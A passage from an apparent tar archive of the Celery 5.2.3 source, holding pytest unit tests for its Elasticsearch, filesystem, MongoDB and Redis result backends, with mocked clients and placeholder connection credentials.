assert x.decode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_decode_encoded_from_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta({'solution': 42}, states.SUCCESS, None, None) assert x.decode(x.encode(result_meta)) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_decode_encoded_exception_as_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) try: raise Exception("failed") except Exception as exc: einfo = ExceptionInfo() result_meta = x._get_result_meta( x.encode_result(exc, states.FAILURE), states.FAILURE, einfo.traceback, None, ) assert x.decode(x.encode(result_meta)) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev @patch("celery.backends.base.KeyValueStoreBackend.decode") def test_decode_not_dict(self, kv_decode_mock): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: kv_decode_mock.return_value = sentinel.decoded x = ElasticsearchBackend(app=self.app) assert x.decode(sentinel.encoded) == sentinel.decoded kv_decode_mock.assert_called_once() finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_config_params(self): self.app.conf.elasticsearch_max_retries = 10 self.app.conf.elasticsearch_timeout = 20.0 self.app.conf.elasticsearch_retry_on_timeout = True self.backend = ElasticsearchBackend(app=self.app) assert self.backend.es_max_retries == 10 assert self.backend.es_timeout == 20.0 assert self.backend.es_retry_on_timeout is True def test_lazy_server_init(self): x = ElasticsearchBackend(app=self.app) x._get_server = Mock() x._get_server.return_value = sentinel.server assert x.server == sentinel.server x._get_server.assert_called_once() def test_mget(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.get.side_effect = [ {'found': True, '_id': sentinel.task_id1, '_source': {'result': sentinel.result1}}, {'found': True, '_id': sentinel.task_id2, '_source': {'result': sentinel.result2}}, ] assert x.mget([sentinel.task_id1, sentinel.task_id2]) == [sentinel.result1, sentinel.result2] x._server.get.assert_has_calls([ call(index=x.index, doc_type=x.doc_type, id=sentinel.task_id1), call(index=x.index, doc_type=x.doc_type, id=sentinel.task_id2), ]) def test_exception_safe_to_retry(self): x = ElasticsearchBackend(app=self.app) assert not x.exception_safe_to_retry(Exception("failed")) assert not x.exception_safe_to_retry(BaseException("failed")) assert x.exception_safe_to_retry(exceptions.ConflictError(409, "concurrent update", {})) assert x.exception_safe_to_retry(exceptions.ConnectionError(503, "service unavailable", {})) assert x.exception_safe_to_retry(exceptions.TransportError(429, "too many requests", {})) assert not x.exception_safe_to_retry(exceptions.NotFoundError(404, "not found", {})) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_filesystem.py0000664000175000017500000001051400000000000021467 0ustar00asifasif00000000000000import os import pickle import sys import tempfile import time from unittest.mock import patch import pytest import t.skip from celery import states, uuid from celery.backends import filesystem from celery.backends.filesystem import FilesystemBackend from celery.exceptions import ImproperlyConfigured @t.skip.if_win32 class test_FilesystemBackend: def setup(self): self.directory = tempfile.mkdtemp() self.url = 'file://' + self.directory self.path = self.directory.encode('ascii') def test_a_path_is_required(self): with pytest.raises(ImproperlyConfigured): FilesystemBackend(app=self.app) def test_a_path_in_url(self): tb = FilesystemBackend(app=self.app, url=self.url) assert tb.path == self.path @pytest.mark.parametrize("url,expected_error_message", [ ('file:///non-existing', filesystem.E_PATH_INVALID), ('url://non-conforming', filesystem.E_PATH_NON_CONFORMING_SCHEME), (None, filesystem.E_NO_PATH_SET) ]) def test_raises_meaningful_errors_for_invalid_urls( self, url, expected_error_message ): with pytest.raises( ImproperlyConfigured, match=expected_error_message ): FilesystemBackend(app=self.app, url=url) def test_localhost_is_removed_from_url(self): url = 'file://localhost' + self.directory tb = FilesystemBackend(app=self.app, url=url) assert tb.path == self.path def test_missing_task_is_PENDING(self): tb = FilesystemBackend(app=self.app, url=self.url) assert tb.get_state('xxx-does-not-exist') == states.PENDING def test_mark_as_done_writes_file(self): tb = FilesystemBackend(app=self.app, url=self.url) tb.mark_as_done(uuid(), 42) assert len(os.listdir(self.directory)) == 1 def test_done_task_is_SUCCESS(self): tb = FilesystemBackend(app=self.app, url=self.url) tid = uuid() tb.mark_as_done(tid, 42) assert tb.get_state(tid) == states.SUCCESS def test_correct_result(self): data = {'foo': 'bar'} tb = FilesystemBackend(app=self.app, url=self.url) tid = uuid() tb.mark_as_done(tid, data) assert tb.get_result(tid) == data def test_get_many(self): data = {uuid(): 'foo', uuid(): 'bar', uuid(): 'baz'} tb = FilesystemBackend(app=self.app, url=self.url) for key, value in data.items(): tb.mark_as_done(key, value) for key, result in tb.get_many(data.keys()): assert result['result'] == data[key] def test_forget_deletes_file(self): tb = FilesystemBackend(app=self.app, url=self.url) tid = uuid() tb.mark_as_done(tid, 42) tb.forget(tid) assert len(os.listdir(self.directory)) == 0 @pytest.mark.usefixtures('depends_on_current_app') def test_pickleable(self): tb = FilesystemBackend(app=self.app, url=self.url, serializer='pickle') assert pickle.loads(pickle.dumps(tb)) @pytest.mark.skipif(sys.platform == 'win32', reason='Test can fail on ' 'Windows/FAT due to low granularity of st_mtime') def test_cleanup(self): tb = FilesystemBackend(app=self.app, url=self.url) yesterday_task_ids = [uuid() for i in range(10)] today_task_ids = [uuid() for i in range(10)] for tid in yesterday_task_ids: tb.mark_as_done(tid, 42) day_length = 0.2 time.sleep(day_length) # let FS mark some difference in mtimes for tid in today_task_ids: tb.mark_as_done(tid, 42) with patch.object(tb, 'expires', 0): tb.cleanup() # test that zero expiration time prevents any cleanup filenames = set(os.listdir(tb.path)) assert all( tb.get_key_for_task(tid) in filenames for tid in yesterday_task_ids + today_task_ids ) # test that non-zero expiration time enables cleanup by file mtime with patch.object(tb, 'expires', day_length): tb.cleanup() filenames = set(os.listdir(tb.path)) assert not any( tb.get_key_for_task(tid) in filenames for tid in yesterday_task_ids ) assert all( tb.get_key_for_task(tid) in filenames for tid in today_task_ids ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/t/unit/backends/test_mongodb.py0000664000175000017500000006707500000000000020746 0ustar00asifasif00000000000000import datetime from pickle import dumps, loads from unittest.mock import ANY, MagicMock, Mock, patch, sentinel import dns.version import pymongo import pytest import pytz from kombu.exceptions import EncodeError try: from pymongo.errors import ConfigurationError except ImportError: ConfigurationError = None from celery import states, uuid from celery.backends.mongodb import Binary, InvalidDocument, MongoBackend from celery.exceptions import ImproperlyConfigured from t.unit import conftest COLLECTION = 'taskmeta_celery' TASK_ID = uuid() MONGODB_HOST = 'localhost' MONGODB_PORT = 27017 MONGODB_USER = 'mongo' MONGODB_PASSWORD = '1234' MONGODB_DATABASE = 'testing' MONGODB_COLLECTION = 'collection1' MONGODB_GROUP_COLLECTION = 'group_collection1' # uri with user, password, database name, replica set, DNS seedlist format MONGODB_SEEDLIST_URI = ('srv://' 'celeryuser:celerypassword@' 'dns-seedlist-host.example.com/' 'celerydatabase') MONGODB_BACKEND_HOST = [ 'mongo1.example.com:27017', 'mongo2.example.com:27017', 'mongo3.example.com:27017', ] CELERY_USER = 'celeryuser' CELERY_PASSWORD = 'celerypassword' CELERY_DATABASE = 'celerydatabase' pytest.importorskip('pymongo') def fake_resolver_dnspython(): TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs): if rdtype == 'SRV': return [ SRV(0, 0, 0, 0, 27017, hostname) for hostname in [ 'mongo1.example.com', 'mongo2.example.com', 'mongo3.example.com' ] ] elif rdtype == 'TXT': return [TXT(0, 0, [b'replicaSet=rs0'])] return mock_resolver class test_MongoBackend: default_url = 'mongodb://uuuu:pwpw@hostname.dom/database' replica_set_url = ( 'mongodb://uuuu:pwpw@hostname.dom,' 'hostname.dom/database?replicaSet=rs' ) sanitized_default_url = 'mongodb://uuuu:**@hostname.dom/database' sanitized_replica_set_url = ( 'mongodb://uuuu:**@hostname.dom/,' 'hostname.dom/database?replicaSet=rs' ) def setup(self): self.patching('celery.backends.mongodb.MongoBackend.encode') self.patching('celery.backends.mongodb.MongoBackend.decode') self.patching('celery.backends.mongodb.Binary') self.backend = MongoBackend(app=self.app, url=self.default_url) def test_init_no_mongodb(self, patching): patching('celery.backends.mongodb.pymongo', None) with pytest.raises(ImproperlyConfigured): MongoBackend(app=self.app) def test_init_no_settings(self): self.app.conf.mongodb_backend_settings = [] with pytest.raises(ImproperlyConfigured): MongoBackend(app=self.app) def test_init_settings_is_None(self): self.app.conf.mongodb_backend_settings = None MongoBackend(app=self.app) def test_init_with_settings(self): self.app.conf.mongodb_backend_settings = None # empty settings mb = MongoBackend(app=self.app) # uri uri = 'mongodb://localhost:27017' mb = MongoBackend(app=self.app, url=uri) assert mb.mongo_host == ['localhost:27017'] assert mb.options == mb._prepare_client_options() assert mb.database_name == 'celery' # uri with database name uri = 'mongodb://localhost:27017/celerydb' mb = MongoBackend(app=self.app, url=uri) assert mb.database_name == 'celerydb' # uri with user, password, database name, replica set uri = ('mongodb://' 'celeryuser:celerypassword@' 'mongo1.example.com:27017,' 'mongo2.example.com:27017,' 'mongo3.example.com:27017/' 'celerydatabase?replicaSet=rs0') mb = MongoBackend(app=self.app, url=uri) assert mb.mongo_host == MONGODB_BACKEND_HOST assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', ) assert mb.user == CELERY_USER assert mb.password == CELERY_PASSWORD assert mb.database_name == CELERY_DATABASE # same uri, change some parameters in backend settings self.app.conf.mongodb_backend_settings = { 'replicaset': 'rs1', 'user': 'backenduser', 'database': 'another_db', 'options': { 'socketKeepAlive': True, }, } mb = MongoBackend(app=self.app, url=uri) assert mb.mongo_host == MONGODB_BACKEND_HOST assert mb.options == dict( mb._prepare_client_options(), replicaset='rs1', socketKeepAlive=True, ) assert mb.user == 'backenduser' assert mb.password == CELERY_PASSWORD assert mb.database_name == 'another_db' mb = MongoBackend(app=self.app, url='mongodb://') @pytest.mark.skipif(dns.version.MAJOR > 1, reason="For dnspython version > 1, pymongo's" "srv_resolver calls resolver.resolve") @pytest.mark.skipif(pymongo.version_tuple[0] > 3, reason="For pymongo version > 3, options returns ssl") def test_init_mongodb_dnspython1_pymongo3_seedlist(self): resolver = fake_resolver_dnspython() self.app.conf.mongodb_backend_settings = None with patch('dns.resolver.query', side_effect=resolver): mb = self.perform_seedlist_assertions() assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', ssl=True ) @pytest.mark.skipif(dns.version.MAJOR <= 1, reason="For dnspython versions 1.X, pymongo's" "srv_resolver calls resolver.query") @pytest.mark.skipif(pymongo.version_tuple[0] > 3, reason="For pymongo version > 3, options returns ssl") def test_init_mongodb_dnspython2_pymongo3_seedlist(self): resolver = fake_resolver_dnspython() self.app.conf.mongodb_backend_settings = None with patch('dns.resolver.resolve', side_effect=resolver): mb = self.perform_seedlist_assertions() assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', ssl=True ) @pytest.mark.skipif(dns.version.MAJOR > 1, reason="For dnspython version >= 2, pymongo's" "srv_resolver calls resolver.resolve") @pytest.mark.skipif(pymongo.version_tuple[0] <= 3, reason="For pymongo version > 3, options returns tls") def test_init_mongodb_dnspython1_pymongo4_seedlist(self): resolver = fake_resolver_dnspython() self.app.conf.mongodb_backend_settings = None with patch('dns.resolver.query', side_effect=resolver): mb = self.perform_seedlist_assertions() assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', tls=True ) @pytest.mark.skipif(dns.version.MAJOR <= 1, reason="For dnspython versions 1.X, pymongo's" "srv_resolver calls resolver.query") @pytest.mark.skipif(pymongo.version_tuple[0] <= 3, reason="For pymongo version > 3, options returns tls") def test_init_mongodb_dnspython2_pymongo4_seedlist(self): resolver = fake_resolver_dnspython() self.app.conf.mongodb_backend_settings = None with patch('dns.resolver.resolve', side_effect=resolver): mb = self.perform_seedlist_assertions() assert mb.options == dict( mb._prepare_client_options(), replicaset='rs0', tls=True ) def perform_seedlist_assertions(self): mb = MongoBackend(app=self.app, url=MONGODB_SEEDLIST_URI) assert mb.mongo_host == MONGODB_BACKEND_HOST assert mb.user == CELERY_USER assert mb.password == CELERY_PASSWORD assert mb.database_name == CELERY_DATABASE return mb def test_ensure_mongodb_uri_compliance(self): mb = MongoBackend(app=self.app, url=None) compliant_uri = mb._ensure_mongodb_uri_compliance assert compliant_uri('mongodb://') == 'mongodb://localhost' assert compliant_uri('mongodb+something://host') == \ 'mongodb+something://host' assert compliant_uri('something://host') == 'mongodb+something://host' @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): x = MongoBackend(app=self.app) assert loads(dumps(x)) def test_get_connection_connection_exists(self): with patch('pymongo.MongoClient') as mock_Connection: self.backend._connection = sentinel._connection connection = self.backend._get_connection() assert sentinel._connection == connection mock_Connection.assert_not_called() def test_get_connection_no_connection_host(self): with patch('pymongo.MongoClient') as mock_Connection: self.backend._connection = None self.backend.host = MONGODB_HOST self.backend.port = MONGODB_PORT mock_Connection.return_value = sentinel.connection connection = self.backend._get_connection() mock_Connection.assert_called_once_with( host='mongodb://localhost:27017', **self.backend._prepare_client_options() ) assert sentinel.connection == connection def test_get_connection_no_connection_mongodb_uri(self): with patch('pymongo.MongoClient') as mock_Connection: mongodb_uri = 'mongodb://%s:%d' % (MONGODB_HOST, MONGODB_PORT) self.backend._connection = None self.backend.host = mongodb_uri mock_Connection.return_value = sentinel.connection connection = self.backend._get_connection() mock_Connection.assert_called_once_with( host=mongodb_uri, **self.backend._prepare_client_options() ) assert sentinel.connection == connection def test_get_connection_with_authmechanism(self): with patch('pymongo.MongoClient') as mock_Connection: self.app.conf.mongodb_backend_settings = None uri = ('mongodb://' 'celeryuser:celerypassword@' 'localhost:27017/' 'celerydatabase?authMechanism=SCRAM-SHA-256') mb = MongoBackend(app=self.app, url=uri) mock_Connection.return_value = sentinel.connection connection = mb._get_connection() mock_Connection.assert_called_once_with( host=['localhost:27017'], username=CELERY_USER, password=CELERY_PASSWORD, authmechanism='SCRAM-SHA-256', **mb._prepare_client_options() ) assert sentinel.connection == connection def test_get_connection_with_authmechanism_no_username(self): with patch('pymongo.MongoClient') as mock_Connection: self.app.conf.mongodb_backend_settings = None uri = ('mongodb://' 'localhost:27017/' 'celerydatabase?authMechanism=SCRAM-SHA-256') mb = MongoBackend(app=self.app, url=uri) mock_Connection.side_effect = ConfigurationError( 'SCRAM-SHA-256 requires a username.') with pytest.raises(ConfigurationError): mb._get_connection() mock_Connection.assert_called_once_with( host=['localhost:27017'], authmechanism='SCRAM-SHA-256', **mb._prepare_client_options() ) @patch('celery.backends.mongodb.MongoBackend._get_connection') def test_get_database_no_existing(self, mock_get_connection): # Should really check for combinations of these two, to be complete. self.backend.user = MONGODB_USER self.backend.password = MONGODB_PASSWORD mock_database = Mock() mock_connection = MagicMock(spec=['__getitem__']) mock_connection.__getitem__.return_value = mock_database mock_get_connection.return_value = mock_connection database = self.backend.database assert database is mock_database assert self.backend.__dict__['database'] is mock_database @patch('celery.backends.mongodb.MongoBackend._get_connection') def test_get_database_no_existing_no_auth(self, mock_get_connection): # Should really check for combinations of these two, to be complete. self.backend.user = None self.backend.password = None mock_database = Mock() mock_connection = MagicMock(spec=['__getitem__']) mock_connection.__getitem__.return_value = mock_database mock_get_connection.return_value = mock_connection database = self.backend.database assert database is mock_database assert self.backend.__dict__['database'] is mock_database @patch('celery.backends.mongodb.MongoBackend._get_database') def test_store_result(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection ret_val = self.backend._store_result( sentinel.task_id, sentinel.result, sentinel.status) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with(MONGODB_COLLECTION) mock_collection.replace_one.assert_called_once_with(ANY, ANY, upsert=True) assert sentinel.result == ret_val mock_collection.replace_one.side_effect = InvalidDocument() with pytest.raises(EncodeError): self.backend._store_result( sentinel.task_id, sentinel.result, sentinel.status) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_store_result_with_request(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_request = MagicMock(spec=['parent_id']) mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection mock_request.parent_id = sentinel.parent_id ret_val = self.backend._store_result( sentinel.task_id, sentinel.result, sentinel.status, request=mock_request) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with(MONGODB_COLLECTION) parameters = mock_collection.replace_one.call_args[0][1] assert parameters['parent_id'] == sentinel.parent_id assert sentinel.result == ret_val mock_collection.replace_one.side_effect = InvalidDocument() with pytest.raises(EncodeError): self.backend._store_result( sentinel.task_id, sentinel.result, sentinel.status) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_get_task_meta_for(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_collection.find_one.return_value = MagicMock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection ret_val = self.backend._get_task_meta_for(sentinel.task_id) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with(MONGODB_COLLECTION) assert list(sorted([ 'status', 'task_id', 'date_done', 'traceback', 'result', 'children', ])) == list(sorted(ret_val.keys())) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_get_task_meta_for_no_result(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_collection.find_one.return_value = None mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection ret_val = self.backend._get_task_meta_for(sentinel.task_id) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with(MONGODB_COLLECTION) assert {'status': states.PENDING, 'result': None} == ret_val @patch('celery.backends.mongodb.MongoBackend._get_database') def test_save_group(self, mock_get_database): self.backend.groupmeta_collection = MONGODB_GROUP_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection res = [self.app.AsyncResult(i) for i in range(3)] ret_val = self.backend._save_group( sentinel.taskset_id, res, ) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with( MONGODB_GROUP_COLLECTION, ) mock_collection.replace_one.assert_called_once_with(ANY, ANY, upsert=True) assert res == ret_val @patch('celery.backends.mongodb.MongoBackend._get_database') def test_restore_group(self, mock_get_database): self.backend.groupmeta_collection = MONGODB_GROUP_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_collection.find_one.return_value = { '_id': sentinel.taskset_id, 'result': [uuid(), uuid()], 'date_done': 1, } self.backend.decode.side_effect = lambda r: r mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection ret_val = self.backend._restore_group(sentinel.taskset_id) mock_get_database.assert_called_once_with() mock_collection.find_one.assert_called_once_with( {'_id': sentinel.taskset_id}) assert (sorted(['date_done', 'result', 'task_id']) == sorted(list(ret_val.keys()))) mock_collection.find_one.return_value = None self.backend._restore_group(sentinel.taskset_id) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_delete_group(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection self.backend._delete_group(sentinel.taskset_id) mock_get_database.assert_called_once_with() mock_collection.delete_one.assert_called_once_with( {'_id': sentinel.taskset_id}) @patch('celery.backends.mongodb.MongoBackend._get_database') def test__forget(self, mock_get_database): # note: here tested _forget method, not forget method self.backend.taskmeta_collection = MONGODB_COLLECTION mock_database = MagicMock(spec=['__getitem__', '__setitem__']) mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__.return_value = mock_collection self.backend._forget(sentinel.task_id) mock_get_database.assert_called_once_with() mock_database.__getitem__.assert_called_once_with( MONGODB_COLLECTION) mock_collection.delete_one.assert_called_once_with( {'_id': sentinel.task_id}) @patch('celery.backends.mongodb.MongoBackend._get_database') def test_cleanup(self, mock_get_database): self.backend.taskmeta_collection = MONGODB_COLLECTION self.backend.groupmeta_collection = MONGODB_GROUP_COLLECTION mock_database = Mock(spec=['__getitem__', '__setitem__'], name='MD') self.backend.collections = mock_collection = Mock() mock_get_database.return_value = mock_database mock_database.__getitem__ = Mock(name='MD.__getitem__') mock_database.__getitem__.return_value = mock_collection self.backend.app.now = datetime.datetime.utcnow self.backend.cleanup() mock_get_database.assert_called_once_with() mock_collection.delete_many.assert_called() self.backend.collections = mock_collection = Mock() self.backend.expires = None self.backend.cleanup() mock_collection.delete_many.assert_not_called() def test_prepare_client_options(self): with patch('pymongo.version_tuple', new=(3, 0, 3)): options = self.backend._prepare_client_options() assert options == { 'maxPoolSize': self.backend.max_pool_size } def test_as_uri_include_password(self): assert self.backend.as_uri(True) == self.default_url def test_as_uri_exclude_password(self): assert self.backend.as_uri() == self.sanitized_default_url def test_as_uri_include_password_replica_set(self): backend = MongoBackend(app=self.app, url=self.replica_set_url) assert backend.as_uri(True) == self.replica_set_url def test_as_uri_exclude_password_replica_set(self): backend = MongoBackend(app=self.app, url=self.replica_set_url) assert backend.as_uri() == self.sanitized_replica_set_url def test_regression_worker_startup_info(self): self.app.conf.result_backend = ( 'mongodb://user:password@host0.com:43437,host1.com:43437' '/work4us?replicaSet=rs&ssl=true' ) worker = self.app.Worker() with conftest.stdouts(): worker.on_start() assert worker.startup_info() @pytest.fixture(scope="function") def mongo_backend_factory(app): """Return a factory that creates MongoBackend instance with given serializer, including BSON.""" def create_mongo_backend(serializer): # NOTE: `bson` is a only mongodb-specific type and can be set only directly on MongoBackend instance. if serializer == "bson": beckend = MongoBackend(app=app) beckend.serializer = serializer else: app.conf.accept_content = ['json', 'pickle', 'msgpack', 'yaml'] app.conf.result_serializer = serializer beckend = MongoBackend(app=app) return beckend yield create_mongo_backend @pytest.mark.parametrize("serializer,encoded_into", [ ('bson', int), ('json', str), ('pickle', Binary), ('msgpack', Binary), ('yaml', str), ]) class test_MongoBackend_no_mock: def test_encode(self, mongo_backend_factory, serializer, encoded_into): backend = mongo_backend_factory(serializer=serializer) assert isinstance(backend.encode(10), encoded_into) def test_encode_decode(self, mongo_backend_factory, serializer, encoded_into): backend = mongo_backend_factory(serializer=serializer) decoded = backend.decode(backend.encode(12)) assert decoded == 12 class _MyTestClass: def __init__(self, a): self.a = a def __eq__(self, other): assert self.__class__ == type(other) return self.a == other.a SUCCESS_RESULT_TEST_DATA = [ # json types { "result": "A simple string", "serializers": ["bson", "pickle", "yaml", "json", "msgpack"], }, { "result": 100, "serializers": ["bson", "pickle", "yaml", "json", "msgpack"], }, { "result": 9.1999999999999999, "serializers": ["bson", "pickle", "yaml", "json", "msgpack"], }, { "result": {"foo": "simple result"}, "serializers": ["bson", "pickle", "yaml", "json", "msgpack"], }, { "result": ["a", "b"], "serializers": ["bson", "pickle", "yaml", "json", "msgpack"], }, { "result": False, "serializers": ["bson", "pickle", "yaml", "json", "msgpack"], }, { "result": None, "serializers": ["bson", "pickle", "yaml", "json", "msgpack"], }, # advanced essential types { "result": datetime.datetime(2000, 1, 1, 0, 0, 0, 0), "serializers": ["bson", "pickle", "yaml"], }, { "result": datetime.datetime(2000, 1, 1, 0, 0, 0, 0, tzinfo=pytz.utc), "serializers": ["pickle", "yaml"], }, # custom types { "result": _MyTestClass("Hi!"), "serializers": ["pickle"], }, ] class test_MongoBackend_store_get_result: @pytest.fixture(scope="function", autouse=True) def fake_mongo_collection_patch(self, monkeypatch): """A fake collection with serialization experience close to MongoDB.""" bson = pytest.importorskip("bson") class FakeMongoCollection: def __init__(self): self.data = {} def replace_one(self, task_id, meta, upsert=True): self.data[task_id['_id']] = bson.encode(meta) def find_one(self, task_id): return bson.decode(self.data[task_id['_id']]) monkeypatch.setattr(MongoBackend, "collection", FakeMongoCollection()) @pytest.mark.parametrize("serializer,result_type,result", [ (s, type(i['result']), i['result']) for i in SUCCESS_RESULT_TEST_DATA for s in i['serializers']] ) def test_encode_success_results(self, mongo_backend_factory, serializer, result_type, result): backend = mongo_backend_factory(serializer=serializer) backend.store_result(TASK_ID, result, 'SUCCESS') recovered = backend.get_result(TASK_ID) assert type(recovered) == result_type assert recovered == result @pytest.mark.parametrize("serializer", ["bson", "pickle", "yaml", "json", "msgpack"]) def test_encode_chain_results(self, mongo_backend_factory, serializer): backend = mongo_backend_factory(serializer=serializer) mock_request = MagicMock(spec=['children']) children = [self.app.AsyncResult(uuid()) for i in range(10)] mock_request.children = children backend.store_result(TASK_ID, 0, 'SUCCESS', request=mock_request) recovered = backend.get_children(TASK_ID) def tuple_to_list(t): return [list(t[0]), t[1]] assert recovered == [tuple_to_list(c.as_tuple()) for c in children] @pytest.mark.parametrize("serializer", ["bson", "pickle", "yaml", "json", "msgpack"]) def test_encode_exception_error_results(self, mongo_backend_factory, serializer): backend = mongo_backend_factory(serializer=serializer) exception = Exception("Basic Exception") traceback = 'Traceback:\n Exception: Basic Exception\n' backend.store_result(TASK_ID, exception, 'FAILURE', traceback) recovered = backend.get_result(TASK_ID) assert type(recovered) == type(exception) assert recovered.args == exception.args ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/backends/test_redis.py0000664000175000017500000014000000000000000020403 0ustar00asifasif00000000000000import itertools import json import random import ssl from contextlib import contextmanager from datetime import timedelta from pickle import dumps, loads from unittest.mock import ANY, Mock, call, patch import pytest from celery import signature, states, uuid from celery.canvas import Signature from celery.contrib.testing.mocks import ContextMock from celery.exceptions import (BackendStoreError, ChordError, ImproperlyConfigured) from celery.result import AsyncResult, GroupResult from celery.utils.collections import AttributeDict from t.unit import conftest def raise_on_second_call(mock, exc, *retval): def on_first_call(*args, **kwargs): mock.side_effect = exc return mock.return_value mock.side_effect = on_first_call if retval: mock.return_value, = retval class ConnectionError(Exception): pass class Connection: connected = True def disconnect(self): self.connected = False class Pipeline: def __init__(self, client): self.client = client self.steps = [] def __getattr__(self, attr): def add_step(*args, **kwargs): self.steps.append((getattr(self.client, attr), args, kwargs)) return self return add_step def __enter__(self): return self def __exit__(self, type, value, traceback): pass def execute(self): return [step(*a, **kw) for step, a, kw in self.steps] class PubSub(conftest.MockCallbacks): def __init__(self, ignore_subscribe_messages=False): self._subscribed_to = set() def close(self): self._subscribed_to = set() def subscribe(self, *args): self._subscribed_to.update(args) def unsubscribe(self, *args): self._subscribed_to.difference_update(args) def get_message(self, timeout=None): pass class Redis(conftest.MockCallbacks): Connection = Connection Pipeline = Pipeline pubsub = PubSub def __init__(self, host=None, port=None, db=None, password=None, **kw): self.host = host self.port = port self.db = db self.password = password self.keyspace = {} self.expiry = {} self.connection = self.Connection() def get(self, key): return self.keyspace.get(key) def mget(self, keys): return [self.get(key) for key in keys] def setex(self, key, expires, value): self.set(key, value) self.expire(key, expires) def set(self, key, value): self.keyspace[key] = value def expire(self, key, expires): self.expiry[key] = expires return expires def delete(self, key): return bool(self.keyspace.pop(key, None)) def pipeline(self): return self.Pipeline(self) def _get_unsorted_list(self, key): # We simply store the values in append (rpush) order return self.keyspace.setdefault(key, list()) def rpush(self, key, value): self._get_unsorted_list(key).append(value) def lrange(self, key, start, stop): return self._get_unsorted_list(key)[start:stop] def llen(self, key): return len(self._get_unsorted_list(key)) def _get_sorted_set(self, key): # We store 2-tuples of (score, value) and sort after each append (zadd) return self.keyspace.setdefault(key, list()) def zadd(self, key, mapping): # Store elements as 2-tuples with the score first so we can sort it # once the new items have been inserted fake_sorted_set = self._get_sorted_set(key) fake_sorted_set.extend( (score, value) for value, score in mapping.items() ) fake_sorted_set.sort() def zrange(self, key, start, stop): # `stop` is inclusive in Redis so we use `stop + 1` unless that would # cause us to move from negative (right-most) indices to positive stop = stop + 1 if stop != -1 else None return [e[1] for e in self._get_sorted_set(key)[start:stop]] def zrangebyscore(self, key, min_, max_): return [ e[1] for e in self._get_sorted_set(key) if (min_ == "-inf" or e[0] >= min_) and (max_ == "+inf" or e[1] <= max_) ] def zcount(self, key, min_, max_): return len(self.zrangebyscore(key, min_, max_)) class Sentinel(conftest.MockCallbacks): def __init__(self, sentinels, min_other_sentinels=0, sentinel_kwargs=None, **connection_kwargs): self.sentinel_kwargs = sentinel_kwargs self.sentinels = [Redis(hostname, port, **self.sentinel_kwargs) for hostname, port in sentinels] self.min_other_sentinels = min_other_sentinels self.connection_kwargs = connection_kwargs def master_for(self, service_name, redis_class): return random.choice(self.sentinels) class redis: StrictRedis = Redis class ConnectionPool: def __init__(self, **kwargs): pass class UnixDomainSocketConnection: def __init__(self, **kwargs): pass class sentinel: Sentinel = Sentinel class test_RedisResultConsumer: def get_backend(self): from celery.backends.redis import RedisBackend class _RedisBackend(RedisBackend): redis = redis return _RedisBackend(app=self.app) def get_consumer(self): consumer = self.get_backend().result_consumer consumer._connection_errors = (ConnectionError,) return consumer @patch('celery.backends.asynchronous.BaseResultConsumer.on_after_fork') def test_on_after_fork(self, parent_method): consumer = self.get_consumer() consumer.start('none') consumer.on_after_fork() parent_method.assert_called_once() consumer.backend.client.connection_pool.reset.assert_called_once() consumer._pubsub.close.assert_called_once() # PubSub 